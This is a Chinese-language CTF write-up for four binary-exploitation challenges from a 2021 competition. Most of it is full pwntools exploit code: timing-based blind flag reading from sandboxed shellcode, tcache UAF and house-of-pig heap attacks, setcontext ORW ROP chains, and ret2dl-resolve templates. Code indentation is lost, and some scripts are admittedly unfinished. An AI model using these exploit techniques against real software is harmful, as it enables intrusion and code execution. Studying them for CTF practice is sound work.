2021能源PWN wp
babyshellcode
这题考无write泄露,write被沙盒禁用时,可以考虑延时盲注的方式获得flag,此exp可作为此类型题目模版,只需要修改部分参数即可,详细见注释
from pwn import *
from pwn import p64,u64,p32,u32,p8
from pwnlib import timeout
context.arch = 'amd64'
# context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']
# elf = ELF('./chall')
# libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
# libc = ELF('')
io = process('./chall')
# 参数分别为:读取的内存地址、按字节增长偏移、ascii值
def exp(targetAddr,offset,ch):
io.recvuntil('Are you a shellcode master?')
# 打开flag文件,
# open('flag',0)
op = asm("""mov rax,0x67616c66
push rax
mov rdi,rsp
push 2
pop rax
push 0
pop rsi
syscall
""")
# 读取flag到指定内存中,
# read(3,targetAddr,0x30)
rd = asm("""push 0
pop rax
push {}
pop rsi
push 3
pop rdi
push 0x30
pop rdx
syscall
""".format(hex(targetAddr)))
# 对flag进行比较,如果不相同则直接返回,会直接EOF,
# 如果相同会进入死循环达到延时效果,依靠EOF时间来判断flag值是否相同
wt = asm("""mov rsi,{2}
cmp byte ptr [rsi+{0}],{1}
jz $-10
ret
""".format(hex(offset),hex(ch),hex(targetAddr)))
# 读取足够长度payload到可执行段中,
# read(0,0x10014,0x100)
sh = asm("""push 0
pop rax
push 0x10014
pop rsi
push 0x100
pop rdx
push 0
pop rdi
syscall
""")
payload = sh
io.send(payload)
pl2 = op
pl2 += rd
pl2 += wt
sleep(0.1)
io.send(pl2)
#flag = 'flag{7DSR6JunIeMwgTz2UyVQobsthxkKEp4L}'
# 外层循环为位,按位爆破
for i in range(37,0x30):
# 内层循环为ascii码
for c in range(0x20,128):
io = process('./chall')
# io = remote('106.14.120.231','26985')
exp(0x10500,i,c)
print('now==>',chr(c))
try:
io.interactive()
io.close()
except:
io.close()
continue
superchunk
用UAF编辑已释放堆块的fd和bk来绕过tcache double free的检查,然后将堆块重叠到tcache bin链表头部,此时tcache bin里面会多出很多杂乱的内容,想办法让其合并,然后里面就有了main_arena的地址,再对地址进行爆破,得到stdout地址,修改flag,泄露libc,最后将__free_hook内写入system,调用free时就会调用system("/bin/sh")
from pwn import *
from pwn import p64,u64,p32,u32,p8,p16
context.arch = 'amd64'
# context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']
# elf = ELF('./superchunk')
# libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
io = process('./superchunk')
# io = remote('106.14.120.231','22521')
def add(size):
io.sendlineafter('Your choice: ','1')
io.sendlineafter('Size: ', str(size))
def delete():
io.sendlineafter('Your choice: ','4')
def edit(content):
io.sendlineafter('Your choice: ','2')
io.sendafter('Content: ', content)
def recv():
leak = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
return leak
atoi = 0x602058
def exp():
add(0x100)
delete()
edit('a'*0x10)
delete()
edit(p16(0x3010))
add(0x100)
add(0x100)
edit('\x00'*0x23+'\x06')
delete()
edit('a'*0x10)
delete()
add(0x80)
delete()
add(0x100)
edit(p16(0xe760))
add(0xb0)
edit(p64(0xfbad3887)+p64(0)*3+p8(0))
leak = recv()
info(hex(leak))
libc_base = leak - libc.sym['__free_hook']+0x38
info(hex(libc_base))
system = libc_base + libc.sym['system']
free_hook = libc.sym['__free_hook']+libc_base
add(0x80)
edit(b'\x03'+b'\x00'*0x3f+p64(free_hook))
add(0x10)
edit(p64(system))
add(0x20)
edit('/bin/sh\x00')
delete()
while 1:
try:
exp()
io.sendline('cat flag')
content = io.recv()
print('flag========%s'%content)
break
except:
io.close()
io = process('./superchunk')
loveheap
程序漏洞点为UAF,可以申请0x40个堆块,每个堆块大小最大为0x200,无法使用largebin attack。总结了一下大概可以用三种方式来解题:
- tcache stash unlink attack 在
free_hook附近写入一个main_arena的值,此时有0x7f的chunk size可以用,直接申请到free_hook,然后写入setcontext函数,利用setcontxt的rdi构造好rdx的值,注意rcx需要是一个可读地址,随便写入一个堆块地址都行。在setcontext时就可以控制rdx的值了,在堆块中构造ROP链来orw。下面的exp也是用的这种方法。 - house of pig,这种方式已经在exp里面写好了,可以调用
system("/bin/sh"),此题开了沙箱,无法获取shell,需要改为orw的方式。暂时还不会改,学会了再来完善。 - 泄露地址后,用tcache stash unlink attack在修改
global_max_fast的值为main_arena的值,那么此时申请的堆块大小都是fastbin,然后从libc里的IO结构体一路申请到free_hook,把free_hook改为setcontext,之后和方法一的过程一样。这种方式可以在限制了申请大小的情况下进行fastbin attack。
from pwn import *
from pwn import p64,u64,p32,u32,p8,p16
context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']
# elf = ELF('./loveheap')
libc = ELF('/usr/lib/x86_64-linux-gnu/libc-2.31.so')
io = process('./loveheap')
def add(size):
io.sendlineafter('>>','1')
io.sendlineafter('Please input the size\n', str(size))
def delete(idx):
io.sendlineafter('>>','2')
io.sendlineafter('Pls input the idx\n', str(idx))
def edit(idx,content):
io.sendlineafter('>>','3')
io.sendlineafter('Pls input the idx\n', str(idx))
io.sendafter('Pls input the content:\n', content)
def show(idx):
io.sendlineafter('>>','4')
io.sendlineafter('Pls input the idx\n', str(idx))
def recv(flag='libc'):
if flag=='heap':
leak = u64(io.recv(6).ljust(8,b'\x00'))
return leak
else:
leak = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
return leak
def exp():
for i in range(9):
add(0x200)
for i in range(7):
delete(i)
delete(7)
show(7)
leak = recv()
info(hex(leak))
libc_base = leak - libc.sym['__malloc_hook'] - 0x10 - 96
info(hex(libc_base))
malloc_hook = libc_base + libc.sym['__malloc_hook']
info(hex(malloc_hook))
for i in range(9):
add(0x68)
for i in range(9):
delete(i+8)
edit(16,p64(malloc_hook-0x33))
add(0x68)
setcontext = libc_base + libc.sym['setcontext']
'''
.text:0000000000157D8A mov rbp, [rdi+48h]
.text:0000000000157D8E mov rax, [rbp+18h]
.text:0000000000157D92 lea r13, [rbp+10h]
.text:0000000000157D96 mov dword ptr [rbp+10h], 0
.text:0000000000157D9D mov rdi, r13
.text:0000000000157DA0 call qword ptr [rax+28h]
'''
max_fast = libc_base + libc.sym['global_max_fast']
add(0x68)
add(0x200)
gdb.attach(io,'b calloc')
add(0x10)
def exp2():
for i in range(8):
add(0x68) # 0-7
delete(i)
for i in range(6):
add(0x90) # 8-13
for i in range(6):
delete(i+8)
for i in range(7):
add(0x190) # 14-20
for i in range(7):
delete(i+14)
for i in range(7):
add(0xe0) # 21-27
for i in range(7):
delete(i+21)
add(0x190) # 28
add(0x1f0) # 29
add(0x190) # 30
add(0x1f0) # 31
delete(28)
show(28)
libc_base = recv() - 96 - libc.sym['__malloc_hook'] - 0x10
libc.address = libc_base
# global_max_fast = libc_base + 0x1eeb80
info(hex(libc.sym['system']))
show(2)
heap_base = recv('heap') - 0x2a0 - 0x70
info(hex(heap_base))
add(0xf0) # 32
delete(30)
add(0xf0) # 33
add(0x190) # 34
edit(30,b'a'*0xf0+p64(0)+p64(0xa1)+p64(heap_base+0x1cc0)+p64(libc.sym['__free_hook']-0x30))
add(0x90) # 35
# ---fastbin attack---#
edit(7,p64(libc.sym['__free_hook']-0x23))
add(0x68) # 36
add(0x68) # 37
prdi = 0x0000000000026b72 + libc_base #: pop rdi ; ret
prsi = 0x0000000000027529 + libc_base #: pop rsi ; ret
prdx = 0x000000000011c371 + libc_base #: pop rdx ; pop r12 ; ret
ret = 0x0000000000044148 + libc_base#: xor eax, eax ; ret
edit(29,'flag')
payload = p64(prdi)+p64(heap_base+0x1d70)+p64(prsi)+p64(0)+p64(libc.sym['open'])
payload += p64(prdi) + p64(3) + p64(prsi)+p64(heap_base+0x1cd0)+p64(prdx)+p64(0x30)+p64(0)+p64(libc.sym['read'])
payload += p64(prdi) +p64(1)+p64(prsi)+p64(heap_base+0x1cd0)+p64(prdx)+p64(0x30)+p64(0)+p64(libc.sym['write'])
edit(31,payload)
edit(8, p64(0)*6+p64(heap_base+0x2110)+p64(ret)+p64(0)*6+p64(heap_base+0x5b0)) #堆块31,大小0x200
edit(37,b'a'*19+p64(libc.sym['setcontext'])) # mov r12, QWORD PTR [rdx+0x48]
# gdb.attach(io)
delete(36)
def house_of_pig():
# ----step 1 . leak info----#
for i in range(8): # 0-7
add(0x90)
for i in range(7):
delete(i+1)
delete(0)
show(0)
leak = recv()
libc_base = leak - libc.sym['__malloc_hook'] - 96 -0x10
info(hex(libc_base))
show(2)
heap_addr = recv('heap') - 0x340
info(hex(heap_addr))
setcontext = libc_base + libc.sym['setcontext'] + 61
system = libc_base + libc.sym['system']
malloc_hook = libc_base + libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
io_list_all = libc_base + libc.sym['_IO_list_all']
#----step 2 . 准备tcache stash unlink attack----#
for i in range(6): # 8-13 size:0xb0
add(0xa0)
for i in range(9): # 14-22 size:0x1b0
add(0x1a0)
for i in range(7):
delete(22-i) # free 22 ~ 16 size:0x1b0
delete(15) # size:0x1b0,放入unsorted bin
add(0xf0) # size:0x100,unsorted bin被切割,剩余大小0xb0
add(0x1f0) # size:0x200,把0xb0放入small bin
delete(14) # size:0x1b0,放入unsorted bin(在15和14中间出现0x100的堆块)
add(0xf0) # size:0x100,unsorted bin被切割,剩余大小0xb0
add(0x1f0) # size:0x200,把0xb0放入small bin
for i in range(6):
delete(8+i) # free 8 ~ 13 size:0xb0,6个0xb0被放入tcache
edit(14,b'a'*0xf8+p64(0xb1)+p64(heap_addr+0xe60)+p64(io_list_all-0x10)) # 编辑0xb0 small bin的fd指针指向heap_addr+0xe60,bk指向io_list_all-0x10
add(0xa0) # 把small bin申请回来,io_list_all会填入一个main_arena的地址
#---- step 3 .构造_IO_FILE_plus结构体 ----#
for i in range(9):
add(0xf0) # 28-36 size:0x100
for i in range(7):
delete(i+28) # free 28 ~ 34 size:0x100
delete(35) # size:0x100,放入unsorted bin
add(0x1f0) # size:0x200,把0x100 大小的unsorted bin放入small bin
payload = p64(0)*2+p64(0)+p64(heap_addr+0x1940)+p64(0) #rdx chunk 22
payload += p64(heap_addr+0x330)+p64(heap_addr+22+0x330)+p64(0)*4 #size 90
payload += p64(heap_addr+0xbb0)+p64(0)+p64(0)+b"\x00"*8 #chain 14
payload += p64(0)*4+b"\x00"*48
payload += p64(0x1ed560+libc_base) # _IO_str_jumps
edit(35, payload) # **Fake IO_FILE_plus1(malloc(0x90))**
edit(1, p64(setcontext)+p64(setcontext))
delete(1) # 删除此堆块后,tcache中链表头部会被写入setcontext函数的地址
add(0x130) # 38
edit(38,b'a'*0x88+p64(0x21)*3+p64(0x21)*2+p64(setcontext)+p64(setcontext)+p64(0x21)*2)
edit(7, p64(malloc_hook))
payload = p64(0)*2+p64(0)+p64(heap_addr+0x1940)+p64(0) #rdx 22
payload += p64(heap_addr+0x350)+p64(heap_addr+22+0x350)+p64(0)*4 #size 90
payload += p64(heap_addr+0xf10)+p64(0)+p64(0)+b"\x00"*8 #chain 16
payload += p64(0)*4+b"\x00"*48
payload += p64(0x1ed560+libc_base)#_IO_str_jumps
edit(14,payload)#Fake IO_FILE_plus2(malloc(0x90) && hijack malloc_hook = setcontext)
binsh_addr = libc_base + next(libc.search(b'/bin/sh\0'))
frame = SigreturnFrame()
frame.rsp = (free_hook&0xfffffffffffff000)+8#16字节对齐
frame.rdi = binsh_addr
frame.rsi = 0
frame.rdx = 0
frame.rip = system
edit(22, bytes(frame)) # 22
payload = p64(0)*2+p64(0)+p64(heap_addr+0x1940)+p64(0) #rdx 22
payload += p64(heap_addr+0x370)+p64(heap_addr+22+0x370)+p64(0)*4 #size 90
payload += p64(0)+p64(0)+p64(0)+b"\x00"*8 #chain 17
payload += p64(0)*4+b"\x00"*48
payload += p64(0x1ed560+libc_base)#_IO_str_jumps
edit(16,payload)#srop
gdb.attach(io)
io.recvuntil('>>')
io.sendline('5')
# house_of_pig()
exp2()
io.interactive()
darkdark
ret2dl-resolve,直接套用模版,改一下总体偏移和gadget地址就可以了
-
partial RELRO,这是正确的exp,最后附上NO RELRO的模版
from pwn import * from pwn import p64,p32 context(os='linux', arch='amd64', log_level='debug') context.terminal=['tmux','sp','-h'] r = process('./darkdark') elf = ELF('./darkdark') libc = ELF('./libc-2.27.so') read_plt = elf.plt['read'] read_got = elf.got['read'] #bss bss = 0x601038 bss_stage = bss + 0x200 l_addr = libc.sym['system'] - libc.sym['read'] # l_addr 通常为负数 pop_rdi = 0x4005d3 #: pop rdi ; ret pop_rsi = 0x4005d1 #: pop rsi ; pop r15 ; ret #用于解析符号dl_runtime_resolve plt_load = 0x400426 def fake_Linkmap_payload(fake_linkmap_addr, known_func_ptr, offset): # &(2**64-1)是因为offset为负数,如果不控制范围,p64后会越界,发生错误 linkmap = p64(offset & (2 ** 64 - 1)) # l_addr # fake_linkmap_addr + 8,也就是DT_JMPREL,至于为什么有个0,可以参考IDA上.dyamisc的结构内容 linkmap += p64(0) # 可以为任意值 linkmap += p64(fake_linkmap_addr + 0x18) # 这里的值就是伪造的.rel.plt的地址 # fake_linkmap_addr + 0x18,fake_rel_write,因为write函数push的索引是0,也就是第一项 # Rela->r_offset,正常情况下这里应该存的是got表对应条目的地址,解析完成后在这个地址上存放函数的实际地址,此处我们只需要设置一个可读写的地址即可 linkmap += p64((fake_linkmap_addr + 0x30 - offset) & (2 ** 64 - 1)) linkmap += p64(0x7) # Rela->r_info,用于索引symtab上的对应项,7>>32=0,也就是指向symtab的第一项 linkmap += p64(0) # Rela->r_addend,任意值都行 linkmap += p64(0) # l_ns # fake_linkmap_addr + 0x38, DT_SYMTAB linkmap += p64(0) # 参考IDA上.dyamisc的结构 # 这里的值就是伪造的symtab的地址,为已解析函数的got表地址-0x8 linkmap += p64(known_func_ptr - 0x8) linkmap += b'/bin/sh\x00' linkmap = linkmap.ljust(0x68, b'A') # fake_linkmap_addr + 0x68, 对应的值的是DT_STRTAB的地址,由于我们用不到strtab,所以随意设置了一个可读区域 linkmap += p64(fake_linkmap_addr) # fake_linkmap_addr + 0x70 , 对应的值是DT_SYMTAB的地址 linkmap += p64(fake_linkmap_addr + 0x38) linkmap = linkmap.ljust(0xf8, b'A') # fake_linkmap_addr + 0xf8, 对应的值是DT_JMPREL的地址 linkmap += p64(fake_linkmap_addr + 0x8) return linkmap fake_link_map = fake_Linkmap_payload(bss_stage, read_got, l_addr) # 伪造link_map payload = flat('A' * 0x38, pop_rdi, 0, pop_rsi, bss_stage, 0, read_plt, # 把link_map写到bss段上 pop_rsi, 0, 0, # 使栈十六字节对齐,不然调用不了system # 把/bin/sh传进rdi,并且调用_dl_rutnime_resolve函数,传入伪造好的link_map和索引 pop_rdi, bss_stage + 0x48, plt_load, bss_stage, 0) r.sendline(payload) # gdb.attach(r) r.send(fake_link_map) r.interactive() -
no RELRO,这只是模版,打不通的!!!
from pwn import * from pwn import p64, u64, p32 context.update(os='linux', arch='amd64') context.log_level = 'debug' context.terminal = ['tmux', 'sp', '-h'] p = process('./darkdark') universal_gadget1 = 0x4005CA universal_gadget2 = 0x4005B0 main_got = 0x400474 # __libc_start_main GOT(PLT) pop_rdi_ret = 0x4005d3 #: pop rdi ; ret jmp_dl_fixup = 0x400426 # jmp cs:qword_601010 pop_rbp_ret = 0x4004b8 #: pop rbp ; ret leave_ret = 0x400564 #: leave ; ret read_got = 0x601020 bss = 0x601038 new_stack_addr = bss+0x500 fake_link_map_addr = bss+0x500+0x30 prsi = 0x4005d1 #: pop rsi ; pop r15 ; ret # libc中已解析函数与想要执行的目标函数的偏移值,如 addr_system-addr_xxx offset = 0x2da40 libc_start_main = 0x600FF0 ############## csu gadget ############# payload = b"" payload += b'A'*(0x30+0x8) # padding payload += p64(universal_gadget1) payload += p64(0x0) payload += p64(0x1) payload += p64(read_got) payload += p64(0) payload += p64(new_stack_addr) payload += p64(0x300) payload += p64(universal_gadget2) payload += b'A'*56 payload += p64(pop_rbp_ret) payload += p64(new_stack_addr) payload += p64(leave_ret) p.send(payload) sleep(0.5) ############# fake Elf64_Dyn ############# ''' Elf64_Dyn{ d_tag dq d_un dq } ''' fake_Elf64_Dyn = b"" fake_Elf64_Dyn += p64(0) # d_tag 从link_map中找.rel.plt不需要用到标签, 随意设置 # d_ptr 指向伪造的Elf64_Rela结构体,由于reloc_offset也被控制为0,不需要伪造多个结构体 fake_Elf64_Dyn += p64(fake_link_map_addr + 0x18+0x18) ########################################## ############# fake Elf64_Rela ########### ''' Elf64_Rela{ r_offset dq r_info dq r_addend dq } ''' fake_Elf64_Rela = b"" # r_offset rel_addr = l->addr+reloc_offset,直接指向fake_link_map所在位置令其可读写就行 fake_Elf64_Rela += p64(fake_link_map_addr + offset+0x18) fake_Elf64_Rela += p64(7) # r_info index设置为0,最后一字节必须为7 fake_Elf64_Rela += p64(0) # r_addend 随意设置 ########################################### ############# fake Elf64_Sym ############# ''' Elf64_Sym{ st_name dd st_info db st_other db st_shndx dw st_value dq st_size dq } ''' fake_Elf64_Sym = b"" fake_Elf64_Sym += p32(0) # st_name 随意设置 # st_info, st_other, st_shndx st_other非0以避免进入重定位符号的分支 fake_Elf64_Sym += b'AAAA' # st_value 已解析函数的got表地址-8,-8体现在汇编代码中,原因不明 fake_Elf64_Sym += p64(libc_start_main-8) fake_Elf64_Sym += p64(0) # st_size 随意设置 ########################################## ############# link_map #################### fake_link_map_data = b"" fake_link_map_data += p64(offset) # l_addr,伪造为两个函数的地址偏移值 fake_link_map_data += fake_Elf64_Dyn fake_link_map_data += fake_Elf64_Rela fake_link_map_data += fake_Elf64_Sym fake_link_map_data += b'\x00'*0x20 fake_link_map_data += p64(fake_link_map_addr+0x18) # DT_STRTAB 设置为一个可读的地址 fake_link_map_data += p64(fake_link_map_addr + 0x30+0x18) # DT_SYMTAB 指向对应结构体数组的地址 fake_link_map_data += b"/bin/sh\x00" fake_link_map_data += b'\x00'*0x78 fake_link_map_data += p64(fake_link_map_addr + 0x8+0x18) # DT_JMPREL 指向对应数组结构体的地址 ########################################### payload = b"" payload += b"BBBBBBBB" payload += p64(prsi) + p64(0)*2 # 清寄存器,否则/bin/sh调用失败 payload += p64(pop_rdi_ret) payload += p64(fake_link_map_addr+0x78+0x18) # /bin/sh\x00地址 # 用jmp跳转到_dl_fixup,link_map和reloc_offset都由我们自己伪造 payload += p64(jmp_dl_fixup) payload += p64(fake_link_map_addr+0x18) # 伪造的link_map地址 payload += p64(0) # 伪造的reloc_offset payload += fake_link_map_data gdb.attach(p) p.send(payload) p.interactive()
